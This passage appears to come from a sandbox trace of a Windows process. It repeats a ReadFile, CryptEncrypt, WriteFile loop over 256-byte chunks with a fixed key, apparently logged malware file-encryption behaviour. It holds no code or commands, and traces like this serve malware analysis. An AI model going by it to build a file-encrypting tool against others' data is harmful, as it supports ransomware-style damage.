dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.796] GetLastError () returned 0x0 [0166.797] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.797] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.797] GetLastError () returned 0x0 [0166.797] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.797] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.797] GetLastError () returned 0x0 [0166.797] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.797] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.797] GetLastError () returned 0x0 [0166.797] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.797] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.797] GetLastError () returned 0x0 [0166.797] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.797] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.797] GetLastError () returned 0x0 [0166.797] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.797] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.797] GetLastError () returned 0x0 [0166.798] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.798] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.798] GetLastError () returned 0x0 [0166.798] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.798] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.798] GetLastError () returned 0x0 [0166.798] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.798] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.798] GetLastError () returned 0x0 [0166.798] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.798] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.798] GetLastError () returned 0x0 [0166.798] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.798] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.798] GetLastError () returned 0x0 [0166.798] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.798] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.798] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.798] GetLastError () returned 0x0 [0166.798] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.799] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.799] GetLastError () returned 0x0 [0166.799] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.799] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.799] GetLastError () returned 0x0 [0166.799] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.799] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.799] GetLastError () returned 0x0 [0166.799] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.799] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.799] GetLastError () returned 0x0 [0166.799] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.799] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.799] GetLastError () returned 0x0 [0166.799] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.799] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.799] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.799] GetLastError () returned 0x0 [0166.799] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.799] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.800] GetLastError () returned 0x0 [0166.800] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.800] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.800] GetLastError () returned 0x0 [0166.800] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.800] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.800] GetLastError () returned 0x0 [0166.800] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.800] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.800] GetLastError () returned 0x0 [0166.800] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.800] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.800] GetLastError () returned 0x0 [0166.800] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.800] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.800] GetLastError () returned 0x0 [0166.800] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.800] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.800] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.800] GetLastError () returned 0x0 [0166.801] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.801] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.801] GetLastError () returned 0x0 [0166.801] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.801] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.801] GetLastError () returned 0x0 [0166.801] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.801] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.801] GetLastError () returned 0x0 [0166.801] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.801] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.801] GetLastError () returned 0x0 [0166.801] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.801] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.801] GetLastError () returned 0x0 [0166.801] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.801] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.801] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.801] GetLastError () returned 0x0 [0166.801] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.801] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.802] GetLastError () returned 0x0 [0166.802] WriteFile 